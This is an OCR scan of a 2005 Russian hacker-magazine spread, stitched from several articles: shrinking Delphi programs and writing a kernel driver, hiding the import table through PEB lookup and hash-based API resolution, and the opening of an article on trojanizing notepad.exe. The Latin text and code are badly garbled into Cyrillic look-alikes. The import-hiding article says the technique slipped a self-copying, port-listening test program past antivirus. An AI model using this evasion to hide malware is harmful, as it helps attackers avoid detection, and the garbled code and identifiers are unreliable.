Кб удовлетворит не всех. Что ж, если постараться, можно ужать его еще в 
несколько раз. Для этого нужно отказаться от удобств работы с борландо- 
вским линкером и собирать исполнимые файлы линкером от Місгозой. К со- 
жалению, здесь нас ждет одна загвоздка. Мелкософтовский линкер исполь- 
зует в качестве основного рабочего формата СОРЕ, но может понимать и 
интеловский ОМР. Однако программисты Борланда (видать, нарочно) в вер- 
сиях Оеіріті выше третьей изменили генерируемый формат оЬ]-файлов так, 
что теперь он несовместим с ІШеІ ОМР. То есть теперь существуют два ви- 
да ОМР: Іпіеі ОМР и Вогіапгі ОМР. РІрограммы, способной конвертировать 
объектные файлы из формата Вогіапб ОМР в СОРР или ІпІеІ ОМР, я не на- 
шел. РІоэтому придется использовать компилятор от ОеІрІті 3, который гене- 
рирует стандартный объектный файл Іпіеі ОМР. Импорт используемых АРІ 
нам тоже придется описывать вручную, причем достаточно необычным спо- 
собом. Для начала возьмем библиотеку импорта изегЗЗ.ІІЬ из состава ѴізиаІ 
С++ и откроем ее в РІЕХ-редакторе. Имена функций в ней имеют вид 
"_МеззадеВохА@16“, где после @ идет размер передаваемых параметров. 
Следовательно, объявлять функции мы будем таким образом: 

Іипсііоп МеззадеВохА(ІіѴѴпсІ: сагсііпаі; ІрТехІ, ІрСарІіоп: РСИаг; иТуре: 
СагсІіпаІ): Іпіедег; зісісаіі; ехіегпаі 'изег32.(іІГ пате '_МеззадеВохА@16'; 

Попробуем теперь написать НеІІоѴѴогІб как можно меньшего размера. Для 
этого создаем проект такого типа: 

ипіі НеІІоѴѴогІсІ; 

іпіегіасе 

Ргосесіиге Зіагі; 

ітріетепіаііоп 

Іипсііоп МеззадеВохА(ІіѴѴпсІ: сагсііпаі; ІрТехІ, ІрСарІіоп: РСІіаг; иТуре: 
СагіііпаІ): Іпіедег; зІсІсаІІ; ехіегпаі изег32.сІІГ пате 

'_МеззадеВохА@16'; 

Ргосесіиге Зіагі; 

Ьедіп 

Мез5адеВохА(0, 'НеІІо шогііі!', піІ, 0); 
еп(1; 

еп(і. 



Тип модуля ^NIТ нужен для того, чтобы компилятор генерировал в объект- 
ном файле символьные имена объявленных процедур. В нашем случае это 
будет процедура 34аг1 — точка входа в программу. Теперь компилируем 
проект следующей строкой: 

гіссзг.ехе -ЗР -$А- В-,С-,0-,0-,Н-,І-,3-,1-,М-0+,Р-0-,РІ-,Т-,и-,Ѵ- ѴѴ+,Х+,Ѵ- 
НеІІоѴѴогІсІ.раз 

Новый файл НеІІоѴѴогІсі.оЬІ открываем в НЕХ-редакторе и смотрим, во что 
превратилась наша точка входа. У меня получилось 31аг1$цргѵ. Это имя 
нужно указать как точку входа при сборке исполнимого файла. И наконец, 
выполним сборку: 

Ііпк.ехе /АиВМ:32 /Р0РСЕ:^NРЕ80^VЕ^ /5иВ8ѴЗТЕМ:\/ѴтОО\/Ѵ8 
/ЕNТРIV:8^а^^$^^^ѵ НеІІоѴѴогІсі.оЬІ изегЗЗ.ІІЬ /оиЬНеІІо.ехе 

в результате мы получаем работающий НеІІоѴѴогІсі размером в 832 байта! 
Я думаю, что этот размер удовлетворит любого. Попробуем теперь дизас- 
семблировать этот файл в ЮА и поискать лишний код: 

; АПгіЬиІез: Ьр-ЬазеЬ Ігагпе 
; сЬаг Тех1[] 

Техі ЬЬ ’НеІІо шг1с1!‘,0 

риЫІс зіагі 
зіан ргос пеаг 

ризЬ О ; иТуре 

ризЬ О ; ІрСарЬоп 

ризЬ оіізеі Техі; ІрТехІ 
ризЬ О ; ЬѴѴпЬ 

саІІ МеззадеВохА 
геіп 
зіаН епсір 

Ни байта лишнего кода! Покажи этот пример всем, кто любит говорить о 
большом размере программ, написанных на дельфи, и понаблюдай за их 
выражением лица — это прикольно :). Самые упорные промычат: «А... Э... 
Все равно дерьмо!», но уже никто ничего не скажет по существу. А самые 
продвинутые спорщики приведут последний аргумент — на ОеІрІтІ нельзя 
написать драйвер режима ядра для ѴѴІпсіоѵѵз МТ. Ничего... сейчас и они 
присоединятся к проигравшим :). 

[пишем драйвер на ОеІрНі] О том, как по нашей методике сделать не- 
возможное — написать на ОеІрІті драйвер режима ядра, даже есть статья на 
НЗОМ, и всем интересующимся я рекомендую ее прочитать. Здесь же я при- 
веду пример простейшего драйвера и содержимое глаке.ЬаІ для его сборки. 
Файл Огіѵег.раз: 

ипіі Огіѵег; 

Іпіегіасе 

ІипсІІоп ОгІѵегЕпІгу(ОгІѵегОЬіесІ, ВедІзІгуРаІЬ: роіпіег): Іпіедег; зІЬсаІІ; 
Ітріетепіаііоп 

ІипсІІоп 0ЬдРгІпІ(81г: РСЬаг): сагЫпаІ; сЬесІ; ехіегпаі пЮзкгпІ.ехе' 
пате '_0ЬдРгІпІ'; 

ІипсІІоп ОгІѵегЕпІгу(ОгіѵегОЬіесІ, ВедІзІгуРаІЬ: роіпіег): Іпіедег; 

Ьедіп 

ОЬдРппІ('НеІІо ѴѴогІсІ!'); 

ВезиІІ := -1; 
епсі; 

епЬ. 

Файл глаке.ЬаГ: 

сіссзг.ехе -ЗР -ЗА-.В-.С-.О-.В-.Н-.І-.З-.Е-.М-.О+.Р-.О-.В-.Т-.и-.Ѵ- 
.ѴѴ+.Х+.Ѵ- Огіѵег.раз 

Ііпк.ехе /ОВІѴЕВ /АЕІѲМ:32 /ВА8Е:0х10000 /8^В8V8ТЕМ:NАТIVЕ 
/Е0ВСЕ:иМВЕ80ЕѴЕ0 /ЕNТВV:^^Iѵе^Еп^^у$^^зрѵ^1 ОгІѵег.оЬ] 
пІозкгпІ.ІІЬ /оиЬОгІѵег.зуз 

Для компиляции нам понадобится файл пІозкгпІ.ІІЬ из ОВК. Мы получим 
драйвер размером в килобайт, который выводит сообщение «НеІІо ѴѴогІсІ» 
в отладочную консоль и возвращает ошибку, а потому не остается в памя- 



ти и не требует определения функции Вгімегипіоасі. Для запуска драйвера 
используй КглсІМападег от Роиг-Р. Увидеть результаты его работы можно в 
софтайсе или ОЬдѴіеѵѵ. 

Рлавная проблема, из-за которой на ОеІрЫ нельзя писать полноцен- 
ные драйвера, — отсутствие ООК. Для написания драйверов нужны 
заголовочные файлы на АРІ-ядра и описания большого количества 
системных структур. Все это богатство есть только для С (от 
МісгозоН) и для МА8М32 (от Роиг-Р). Есть слух, что ООК для паска- 
ля уже существует, но автор продает его за деньги и сильно этот 
факт не афиширует. Думаю, когда-нибудь все-таки найдутся энту- 
зиасты, которые перепишут ООК на паскаль и выложат для всеоб- 
щего использования. 

Другой проблемой является то, что большинство примеров, связан- 
ных с системным программированием, написаны на си, поэтому на ка- 
ком бы языке ты ни писал свои программы, си знать придется. Это, 
конечно, не означает, что придется изучать С-ь-г в полном его объеме. 
Для понимания системных программ хватит базовых знаний синтакси- 
са, все остальное же используется только в прикладных программах, 
которые нас совершенно не интересуют. 

[переносимость кеда] РІри программировании на стандартных 
□еІрЫ компонентах, кроме кучи недостатков, мы получаем одно 
достоинство — некоторую переносимость кода. Если программа ис- 
пользует только возможности языка, но не возможности системы, 
то она будет легко компилироваться в КІІІх и работать в Еіпих. Воя 
проблема в том, что без использования возможностей системы мы 
получим настоящее глюкалово, тяжелую и неэффективную прог- 
рамму. Тем не менее, при написании серьезных программ по выше- 
описанным методикам, все-таки хочется иметь некоторую незави- 
симость от системы. Получить ее очень просто — достаточно писать 
код, не использующий ни АРІ-функций, ни возможностей языка во- 
обще. В некоторых случаях это совершенно невозможно (например, 
в играх), но иногда функции системы абсолютно не нужны (напри- 
мер, в математических алгоритмах). 

В любом случае, следует четко разделять машинно-зависимую и ма- 
шинно-независимую (если такая есть) части кода. При соблюдении 
вышеописанных правил машинно-независимая часть будет совмес- 
тима на уровне исходных текстов с любой системой, для которой 
есть компилятор паскаля (а он есть даже для РІС-контроллеров). Не- 
зависимый от АРІ код можно смело компилировать в ОЕЕ и исполь- 
зовать, например, в драйвере режима ядра. Также такую ОЕЕ не сос- 
тавит труда использовать и в других ОС. Для этого нужно просто по- 
секционно отмапить ОЕЕ в адресное пространство процесса, настро- 
ить релоки и смело пользоваться ее функциями. Осуществляющий 
это код на паскале занимает около 80 отрок. Если же ОЕЕ все-таки 
использует некоторые АРІ-функции, то их наличие можно проэмули- 
ровать, заполнив таблицу импорта ОЕЕ адресами заменяющих их 
функций в своей программе. 

[общие приемы оптимизации] Старайся везде, где можно, ис- 
пользовать указатели. Никогда не передавай данные в функцию та- 
ким образом: 

ргосесіиге Еід2паеІ(0аІа: Т81гис1иге); 

Всегда передавай указатели на структуры: 

ргосесіиге ЕІд2паеІ(р0аІа: Р81гис1иге) ; где Р81гис1иге = ''Т81гис1иге; 

Такой вызов происходит быстрее и экономит немалое количество кода. 
Старайся не пользоваться типом данных зСгІпд, вместо него всегда 
можно использовать Рсбаг и обрабатывать строки вручную. Если ну- 
жен временный буфер для хранения строки, то его следует объявить в 
локальных переменных как аггау оС сИаг. Старайся передавать в функ- 
цию не больше трех параметров: первые три параметра согласно ме- 
тоду вызова ГазІсаІІ (который по умолчанию применяется в ОеІрИІ) пе- 
редаются в регистрах, а все последующие через отек, что замедляет 
доступ к ним и увеличивает размер кода. Экономь память: если, нап- 
ример, у тебя есть массив чисел, диапазон которых укладывается в 
байт, то не нужно объявлять его как сіѵѵогсі. Никогда не стоит писать 
повторяющийся код. 

Если какие-либо действия должны повторяться, то их нужно вынести 
в функцию. Тем не менее, не стоит делать функцию, содержащую 
две строчки кода, — ее вызов может занимать куда больше места, 
чем она сама. И помни главное: эффективность кода в первую оче- 
редь определяется не компилятором, а примененным алгоритмом, что 
эффективнее © 
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Долой импорт! 



я ДАВНО УБЕДИЛСЯ, ЧТО ОТ ТАБЛИЦЫ ИМ- 
ПОРТА — ОДНО ТОЛЬКО ЗЛО. ИСПОЛЬЗОВА- 
НИЕ ЕЕ ПРОГРАММОЙ МНОГОКРАТНО УПРО- 
ЩАЕТ ЖИЗНЬ ИССЛЕДОВАТЕЛЮ. ЕМУ ВСЕГО- 
ТО И НАДО, ЧТО ЗАГНАТЬ ЭКЗЕШНИК В ДИ- 
ЗАССЕМБЛЕР И ВНИМАТЕЛЬНО ИЗУЧИТЬ ПО- 
ЛУЧЕННЫЕ ЛИСТИНГИ. АЛГОРИТМ РАБОТЫ 
МОЖНО БУДЕТ ОЧЕНЬ ЛЕГКО ВОССТАНО- 
ВИТЬ ПО ЯРКИМ МЕТКАМ ВЫЗОВОВ АРІ И 
ПРИЯТНОМУ ГЛАЗУ АССЕМБЛЕРНОМУ КОДУ. 
НЕТ, ТАК ДЕЛО НЕ ПОЙДЕТ. МНЕ ЕЩЕ НЕ ХВА- 
ТАЛО, ЧТОБЫ КАЖДЫЙ, КТО СМОЖЕТ ДИ- 
ЗАССЕМБЛЕР ЗАГРУЗИТЬ СМОГ ПОНЯТЬ, КАК 
МОИ ПРОГРАММЫ РАБОТАЮТ. В ЭТОМ МАТЕ- 
РИАЛЕ Я ПОКАЖУ, КАК МОЖНО НЕМНОГО 
ПОДПОРТИТЬ ЖИЗНЬ РЕВЕРСЕРУ, ИССЛЕДО- 
ВАТЕЛЮ, ВЗЛОМЩИКУ — В ОБЩЕМ, ЛЮБОМУ, 
КТО ЗАХОЧЕТ ПОНЯТЬ, ЧТО ДЕЛАЕТ ТВОЯ 

ПРОГРАММА I Николай «ѲогІиМ» Андреев (дог1ит@геа1.хакер.ги) 





Пишем приложение, 
не использующее таблицу 
импорта, на Си 

[ищем функции сами] Идея моя достаточно проста: заставить програм- 
му забыть такую страшную вещь как таблицу импорта. Причем не просто 
забыть, а забыть навсегда, чтобы ничто не напоминало о ней. Ни РЕ-заго- 
ловок, ни имена АРІ-функций разбросанные по всему файлу. Делается это 
легко. Надо просто в программе вызывать все функции в обход импорта с 
помощью, скажем, той же ѲеІРгосАсісІгезз. Тогда компилятор не будет за- 
пихивать их в таблицу. Но сам адрес функции поиска АРІ содержится в им- 
порте. И даже, если все функции вначале искать с помощью ОеІРгосАсісІгезз, 
таблица все равно останется. Хоть и о одной записью, но останется. Но не 
надо забывать о том, что одним из параметров этой функции является имя 
АРІ, что, несомненно, сразу все выдаст исследователю. Поэтому имеет 
смысл сделать свою собственную функцию для поиска адресов функций, 
которые обычно прописываются в таблице импорта. Тьфу, сделать — хоро- 
шо сказал. Не надо ее делать, я ее уже давно сделал, и если ты читал пре- 
дыдущие номера журнала и залезал на диск, ты должен был ее видеть. 
Смысл собственной функции в том, что: 

О] ее не будет в таблице импорта, а следовательно, исследователю придет- 
ся прилично покопаться, чтобы понять, что делает ее вызов; 

[2] поиск может осуществляться не только по имени, но, например, и по хэ- 
шу, посчитанному от имени (в этом случае в программе вообще не фигури- 
рует имени АРІ, что серьезно затрудняет процесс исследования алгоритма 
работы программы... ну, конечно, не для всех серьезно, но все же). 

В общем, бери ее с диска. Однако, как ты помнишь, функция ОеІРгосАсісІгезз 
производит поиск адрес по таблице экспорта заданного тобой модуля. 
Обычно дескриптор, определяющий модуль, получается о помощью функ- 
ций ОеІМосіиІеНапсіІе или ЕоасіЕІЬгагу. Но в данном случае, вот засада, эти 
функции вызывать в исходном коде нельзя, так как это приведет к тому, 
что появится таблица импорта, о которой мы стремимся забыть. Поэтому 
придется отыскивать дескрипторы (привычнее, наверное, назвать их хэнд- 
лами) обходными путями. 

[ищем ядро и модули] Ядро, то есть дескриптор, то есть хэндл биб- 
лиотеки кегпе132.б11 найти очень просто (она подгружается к каждому 






процессу, поэтому не надо никак дополнительно извращаться — толь- 
ко найти). Этим всю жизнь занимаются вирмейкеры, и поэтому метод, 
где только не описан. Заключается он в том, что дескриптор модуля яд- 
ра извлекается в общей сложности из структуры РЕВ, блока окружения 
процесса, ссылку на который можно получить, если обратиться к реги- 
стру ?з по смещению ЗОб. 

[всем известный поиск ядра] 

НМООиіЕ ееЖегпеІ() 

{ 

_а5гп { 

тоѵ еах, сіѵѵогсі рІгІз:[30(і] 
тоѵ еах, сіѵѵогсі ріг [еахч-Осіі] 
тоѵ е$і, СІѴѴОГСІ ріг [еах+ісіі] 

ІОСІЗСІ 

тоѵ еах, сіѵѵогсі ріг [еах+081і] 

} 

) 

Имея ядро, можно найти в нем с помощью собственной функции 
ОеГРгосАббгезз адрес ЕоасІЕІЬгагу, подгрузить с ее помощью любую нуж- 
ную библиотеку и искать уже в ней адрес необходимой для работы 
программы функции (как вариант, можно найти адрес ОеІМосІиІеНапсІІе). 
Геморрой, конечно, но он просто автоматизируется, а исследовате- 
лю жизнь все-таки усложняет. В итоге, со всеми извращениями за- 
пуск АРІ-функции, к примеру, МеззадеВох'а на Си выглядит следу- 
ющим образом: 

[я не такой уж и извращенец, честное слово!] 

Іуресіеі іпі (ѴѴІІМАРІ * ІМеззадеВохА) 

(НШО, ІРСЗТРІ, ІРС8ТРІ, иШТ); 

Іуресіеі НМООиіЕ (ѴѴІМАРІ * ІЕоасІЕІЬгагуА) 

(ЕРСЗТВ); 

НМООУЕЕ ІіКегпеІ32 = СеІКегпеІ(); 

ІЕоасіиЬгагуА рЕоасіиЬгагуА = ОеІРгосАсІсІгеззЕх 
(ІіКегпеІ32, "ЕоасіиЬгагуА”); // 0хС8АС8026 

НМООУЕЕ Ііизег32 = рЕоасІЕІЬгагуА ("изег32.сІП"); 

ІМеззадеВох рМеззадеВох = ОеІРгосАсІсІгеззЕх 
(Шзег32, "МеззадеВохА" ); // ОхАВВСбВОО 

рМез5адеВох(0, "НеІІо ѵѵогісі”, 0); 



[хэш-с]зункция] 

ОѴѴОРІО СаІсНазЩсІіаг *з1г) 

{ 

ОѴѴОРО йазй = 0; 
сііаг* сорузіг = зіг; 
ѵѵІііІе(*сорузІг) I 

йазИ = ((йазй « 7) & (0ѴѴ0Рі0)(-1))І(ІіазІі » (32-7)); 

йазИ = ІіазІі''(*сору5Іг); 

сорузІг++; 

) 

геіигп ІіазИ; 

1 

Число, полученное в результате подсчета, почти уникально. Конечно, 
это я очень хреново выразился. Я хотел сказать, что вероятность того, 
что от двух разных строк ты получишь одно число — очень мала. А на 
пространстве имен функций какой-нибудь одной библиотеки вообще 
равна нулю. Потому-то и можно искать функцию в таблице экспорта, 
сравнивая не имена, а числа. Это позволяет хранить не палевное наз- 
вание АРІ в программе, а всего лишь 4 байта хэша, которые влезают 
в любой регистр и могут просто жить в какой-нибудь инструкции, пря- 
мо в коде, а не в данных. Меня это обстоятельство радует безумно. Я 
вообще данные в программе не люблю. 

Чтобы иметь возможность искать имя по хэшу, достаточно немного моди- 
фицировать функцию ОеІРгосАсІсІгеззЕх. Второй параметр ее станет 
□ѴѴОРЮ'ом вместо указателя на строку, а внутри вместо сравнения имен: 

ІІ (ІзІгстр((сІіаг*)ВѴАТОѴА(ІіМосІиІе, *рсIѵѵNатеР^г), ІрРгосМате) == 0) 

Будет сравнение второго параметра (базб) и подсчитанного хэша от рас- 
сматриваемого в конкретный момент имени функции: 

ІІ (СаІсНа5Іі((сІіаг*)ВѴАТОѴА(ІіМосІиІе, ‘рсІѵѵМатеРІг)) == йазй) 

Запуск МеззадеВох'а с такой функцией преобразиться следующим образом: 

НМООУЕЕ ІіКегпеІ32 = ОеІКегпеІ(); 

ІЕоасІІІЬгагуА рЕоасіиЬгагуА = йеІРгосАгігІгеззЕх 
(ІіКегпеІ32, 0хС8АС8026); 

НМООУЕЕ Шзег32 = рЕоасШЬгагуА ("и5ег32.сІІІ"); 

ІМеззадеВох рМеззадеВох = ОеІРгосАсІсІгеззЕх 
(ІЮзег32, ОхАВВСбВОО); 



Упо, наврал... Не со всеми извращениями. Ведь тут поиск осуществляется 
по имени, а нас это, как я уже говорил, не устраивает. Будем переделывать 
поиск, чтобы искал по хэшу. 

[ищем функции по хэшу] Хэш — это некоторое число, которое счита- 
ется от строки. Хэш-функция, соответственно, функция, — которая будет 
это число считать. Его ведь можно кучей разных способов получать. Она у 
нас будет очень простенькая, я ее выдрал из замечательных программ 
гОтЫе и переписал на Си. 




Мисб ЬеГІег, теперь имена функций нигде в программе не фигурируют. Но 
черт! Так невозможно программировать! Уж лучше все знают, как моя 
программа работает. Ведь надо считать для каждой функции хэш, подстав- 
лять по мере необходимости, заново описывать каждую АР!. В общем, я как 
обычно придумал кучу проблем, чтобы о ней разобраться. 



[удобный интерфейс] Первое, от чего я хочу избавиться, так это от бес- 
конечных определений функций. Всех этих ІуребеГ'ов кошмарных и т.п. Сде- 
лать это оказалось на удивление легко. Я просто создал несколько перегру- 




Обладая огромным везе- 
нием и терпением, на дис- 
ке ты сумеешь откопать 
все исходные коды, опи- 
санные в статье. 




Про это ты, наверное, ниг- 
де больше не сможешь 
прочесть. Это уникальная 
разработка никому кроме 
автора не нужная. 




куча шаблонов 



вызов функции под дизасоембером 



[хакер 08 [80] 05 > КОДИНГ 117] 





[хакер 08 [80] 05 > кодинг 1 1 8] 



женных шаблонов функций, которые в общей сложности могли принимать 
любое число параметров. И для выполнения нужной функции передавал шаб- 
лону хэш, хэндл модуля и аргументы. Все. Определять при этом каждую АРІ 
не нужно, знай себе юзай шаблоны для ВСЕГО. Этакие гейты для АРІ. Мож- 
но в них встроить какую-нибудь систему легирования, чтобы видеть все вы- 
зовы своей программы. Можно какой-нибудь время от времени срабатыва- 
ющий антиотладочный прием поставить. Г ейт для АРІ в своей программе — 
полезная штука. В качестве препятствия анализу — особенно. Шаблоны 
выглядят так: 

//для функции без аргументов, к примеру беІТІскСоипІ 
Іетріаіе <НМ00иіЕ Іі, ОѴѴОВО ИазЬ 
іпііпе ЕРѴОЮ ризИагдЕхО 
{ 

Іуребе! ЕРѴОЮ (ѴѴІМАРІ *пеѵѵІипс)(); 

пеѵуіипс Іипс = (пе\л/Іипс)беІРгосАсІ(1геззЕх(ф Ііазіі); 

геіигп Іипс(); 

) 



[пример программы без таблицы импорта] 

/ргадгпа сотпіеп!(Ііпкег,7ЕМТРІѴ:\/ѴіпМаіп”) 

#іпсІисІе <ѵуіпсІоѵѵ5.Іі> 

/іпсіисіе "кегпеІ32.сІІІ.Іі" 

/іпсіисіе "изег32.бІІ.б" 

//хидер с функциями беІРгосАббгеззЕх, шаблонами и т.п 
#іпсІисІе "поітрогі.б" 

НМООУЕЕ кегпеІ32; 

НМООУЕЕ изег32; 

іпі ѴѴІМАРІ \/VіпМаіп(НIN8ТАNСЕ, НIN8ТАNСЕ, РТ8ТР, ІШ) 

{ 

кегпеІ32 = йеЖегпеІ(); 

изег32 = ОЕоасіиЬгагуА ("изег32.сІН"); 



//для функции с одним аргументом 
Іетріаіе <НМ00ІЛЕ б, ОѴѴОРО базб, сіазз А> 
іпііпе ЕРѴОЮ ризбагдЕх(А а1) 

{ 

Іуребе! ЕРѴОЮ (ѴѴІМАРІ *пе\л/Іипс)(А); 

пеѵуіипс Жпс = (пеѵѵІипс)СІеІРгосАсІбгеззЕх(б, базб); 

геіигп Іипс(а1); 

) 



ОМеззадеВох(0,"НеІІо шог1с1'',0,0); 
геШгп 0; 

1 



[тестируем] Ну, что в итоге мы получили, кроме того, что в РЕ-заголовке 
больше нельзя найти ссылки на таблицу импорта. Обычный определяемый 
любым дизассемблером вызов функции, вроде этого: 



ризб 1000 

// ДЛЯ функции С двумя аргументами саІІ [81еер] 

Іетріаіе <НМ00Е1ЕЕ б, ОѴѴОРО базб, сіазз А, сіазз В> 

іпііпе ЕРѴОЮ ризбагдЕх(А а1, В а2) изменился на: 

{ 



Іуребе! ЕРѴОЮ (ѴѴІМАРІ *пеш1ипс)(А, В); 
пеѵуіипс Іипс = (пе\л/Іипс)ОеІРгосАсІбгеззЕх(б, базб); 
геіигп 1ипс(а1,а2); 

) 



// для функции с тремя аргументами 

Іетріаіе <НМ000ЕЕ б, ОѴѴОВО базб, сіазз А, сіазз В, сіазз С> 

іпііпе ЕРѴОЮ ризбагдЕх(А а1, В а2, С аЗ) 

I 

Іуресіеі ЕРѴОЮ (ѴѴІМАРІ *пе\л/Іипс)(А, В, С); 
пеѵуіипс Іипс = (пеѵѵІипс)СІеІРгосАсІбгеззЕх(б, базб); 
геіигп Іипс(а1,а2,аЗ); 

I 



// и т.д. 

Соответственно, вызов функции через них может выглядеть следующим 
образом: 

// вызовем, например, 81еер с аргументом - 

//1000, то есть одна секунда 

// кегпе132 - хэндл ядра, вычисленный ранее 

ризбагдЕх<кегпе132, 0хЗО9972Р5>(1000); 

Просто, неправда ли? Однако по-прежнему смущают хэши, которые надо 
вычислять для каждой функции. Для того, чтобы не приходилось занимать- 
ся еще и этим геморроем, я написал отдельную маленькую утилиту, кото- 
рая вычисляет хэши и создает И-файл со специальным определением всех 
функций в заданной Ц|1. Она вместе о сорцами лежит на диске. Пользовать- 
ся ей очень легко, пишешь саІсИазІі изег32.Ц|1, она тебе выдает файл 
изег32.с111.И о содержанием, вроде такого: 



#сІеІіпе ОМеззадеВеер 
#беІіпе ОМеззадеВохА 
#беІіпе ОМеззадеВохЕхА 
#сІеІіпе ОМеззадеВохЕхѴѴ 



ризбагдЕх<изег32, 0хАВВЕЕ6ВС> 
ризбагдЕх<изег32, 0хАВВС680О> 
ризбагдЕх<изег32, 0х1А0256АЕ> 
ризбагдЕх<изег32, 0х1А0256В8> 



Как ты уже понял, если добавить подобный хидер в программу вместе 
с описанными выше функциями, то для вызова АРІ в обход таблицы импорта 
будет достаточно приписать к имени функции буковку О ;). Ну и, конечно, 
не забыть подгрузить в самом начале все библиотеки, назвав переменные 
с их хэндлами по левой части имени файла ШІ. 



ризб 309972Р56 
ризб [езр-гѵаг_4] 
саІІ зиЬ_2АА026Е4 
ризб 1000 
саІІ еах 

в коде теперь мало что понятно, правда? И если покруче покопаться, то с ди- 
зассембером будет тоже самое. Но можно постепенно понять, что 
зиЬ_2АА026Е4 — это аналог функции ОеІРгосАЦЦгезз. Однако ищет функцию 
он не по имени, а по посчитанной хэш-функции от имени. КошмарІ Чтобы 
разобраться в том, что делает программа, написанная подобным образом, 
придется не один час просидеть с отладчиком и дизассемблером в руках, 
пытаясь сопоставить, какому из подобных вызовов какой обычный АРІ-вы- 
зов соответствует. 

Не одному только реверсору, кстати, кошмар. Всяческие эвристики и по- 
добная фигня на этом деле тоже вымрут — проверено. Взять, к примеру, 
N0032. Я для теста написал маленькую программу, копирующую себя в 
системную директорию, в реестр и слушающую порт. N0032 на паранои- 
дальном уровне безопасности тот час же окрестил ее как «вероятно ви- 
рус». Потом я заменил все вызовы на мои «хитрые». Угадай, что на это ска- 
зал антивирус? Ничего плохогоі Скушал, буркнул «спасибо, вирусов не 
найдено, приходите еще», и на боковую. 

И это ведь только начало такой замечательной штуки как ргесотріІеЦ- 
метаморфизм (вероятно, термин я придумал дурацкий, зато достиг в 
этой штуке немалого). Компилятор можно научить таким офигенным 
штукам, какие и не снились обычным полиморфным или метаморфным 
движкам. Полная перестройка программы для них — пустяк. Главное — 
правильно оформить исходный код, то есть научить всему компилятор. 
Можно, к примеру, заставить его оформлять разные вызовы. Скажем, в 
зависимости от номера строки исходного кода вставлять либо саІІ, либо 
рцзЦ $-ь5\ризП асШгѴеІ, либо еще что-нибудь. Хэш-функции использовать 
все время разные. Можно попробовать научить компилятор (о, недоку- 
ментированные возможности, как вы прекрасны и ужасны одновремен- 
но) перегружать операторы стандартных типов. Ты представь только — 
подсунуть свой оператор присваивания вместо дефолтного, и впихивать 
в него все время кучу лишнего кода и каких-нибудь нехороших трюков 
еще на этапе компиляции. Можно написать отличную систему, которая 
позволяла бы обычные нормальные программы компилировать так, 
словно компилятор в задницу оса укусила, так что никакие протекторы и 
упаковщики не понадобятся. 

Тебя, наверно, мучает вопрос: а зачем все это действительно нужно? Ус- 
ложнение анализа и т.п. — это понятно, а зачем метаморфизм какой-то, да 
еще и на этапе компиляции. Почему бы ни использовать готовые навесные 
протекторы, зачем устраивать весь этот геморрой? 

Буду краток. Ради Дао @ 
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ЮНИТЫ КРЕАТИФФ КОДИНГ УМІХОЮ СЦЕНА ВЗЛОМ ИМПЛАНТ РС_20МЕ РЕПВУМ НЬЮСЫ 




Внедряем свой код 
в приложения под ѵѵіпсіоѵѵз 

Наши эксперименты будут носить совершенно невинный характер. 
Мы возьмем стандартный поіераб.ехе и будем над ним издеваться — внед- 
рять код, изучать всячески, мучать. Лицензионное соглашение от Міогозой 
нам придется разорвать. Причем на мелкие куски. Оно нам больше не по- 
надобится. Модификация поіераб'а аннулирует все льготы, обязательства 
и гарантии со стороны МіогозоЙ. Свежую ѴѴІпбоѵѵз со скидкой уже не полу- 
чишь! Ну и больно надо! Поставим Ыпих! Но это потом, а пока... 
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троянизация 

ТРОЯНИЗАЦИЯ ПРИЛОЖЕНИЙ — ВЕСЬМА 
ПЕРСПЕКТИВНАЯ ДЛЯ ХАКЕРА ШТУКА. ОНА 
ПОЗВОЛЯЕТ ЕМУ С НЕВИДАННОЙ СКО- 
РОСТЬЮ РАСПРОСТРАНЯТЬ ТРОЯНЫ ПОД ВИ- 
ДОМ САМЫХ ОБЫЧНЫХ ПРОГРАММ. ПРИЧЕМ 
НЕ ПРОСТО ПОД ВИДОМ. ПРОГРАММЫ ПРО- 
ДОЛЖАЮТ РАБОТАТЬ И НОРМАЛЬНО ФУНКЦИ- 
ОНИРОВАТЬ, НЕ ВЫДАВАЯ ЕГО ВРЕДОНОСНО- 
ГО КОДА, КОТОРЫЙ СПОКОЙНО И ТИХО ГА- 
ДИТ ПОЛЬЗОВАТЕЛЮ, СНИФАЯ КЛАВУ, ВОРУЯ 
ПАРОЛИ И Т.П. ПРОЧИТАВ ЭТУ СТАТЬЮ, ТЫ 
ПОЙМЕШЬ, КАК ХАКЕРЫ ВНЕДРЯЮТ СВОЙ ВИ- 
РУСНЫЙ КОД В ПРИЛОЖЕНИЯ, НЕ ПОРТЯ РА- 
БОТОСПОСОБНОСТИ ПОСЛЕДНИХ. ТЫ, КОНЕЧ- 
НО, СООБРАЗИШЬ КАК ЭТОТ КОД ОБНАРУ- 
ЖИТЬ И ИЗВЛЕЧЬ! Крис Касперсжи ака мыщьх (РгееВЗО@зггЛр.ш) 



[джентльменский набор] Большинство хакерских статей, рассказыва- 
ющих о троянизации приложений, предлагает напрямую править их в НІЕѴѴ 
или любом другом НЕХ-редакторе. Но это порочная практика (живодерство 
сплошное)! Полноценную программу в НІЕѴѴ не напишешь, а если и напи- 
шешь, то потом не изменишь, ведь чтобы добавить одну-единственную ко- 
манду приходится перебивать весь код целиком. 

Поступим умнее! Наберем программу в своем любимом редакторе, напри- 
мер, ТА8МЕ0, ѴѴІпАзт 8ШсІіо или РАН'е и откомпилируем ее РА8М'ом. 
Полученный двоичный файл будет легко вставляться НЕХ-редактором 
в любой экзешник. Ну, или почти в любой. 

Еще нам потребуется ЮА Рго или другой приличный дизассемблер, кото- 
рым мы будем исследовать подопытный файл. Отладчик — 8оЙ1СЕ, М8 
□ВѲ или ОІІуОЬд. Он поможет найти ошибки во внедряемом коде. Крайне 
маловероятно, что написанная нами программа заработает с первого раза, 
поэтому без отладчика далеко не уплывешь. 

Остальные ингредиенты (пиво/квас/сигареты) по вкусу. 

[куда податься?] Проще всего внедряться в свободное место файла. 
Кстати, предупреждаю, что троянизируемый файл мы будем называть дро- 
зофилой, а внедряемый код — бациллой. Если свободного места нет, мож- 
но раздвинуть последнюю секцию и внедриться в нее, но это намного слож- 
нее, поэтому такой способ здесь рассматриваться не будет. Если тебе все- 
таки интересно, как подобное реализуется — топай на тѵѵѵѵ.тазт.ги за 
статьей «пути воина — техника внедрения в РЕ-файлы». 

Типичный РЕ-заголовок вместе с таблицей секций и М2-заголовком зани- 
мает чуть больше 200И байт, а минимальное физическое выравнивание 
внутри файла (РІІе АІІдпгпепІ), которое только поддерживает ѴѴІпсіоѵѵз, как 
раз и составляет 200И! Таким образом, в нашем распоряжении оказывает- 




текст дрозофилы, набранный в редакторе ѴѴІпАзт 8ШсІіо 





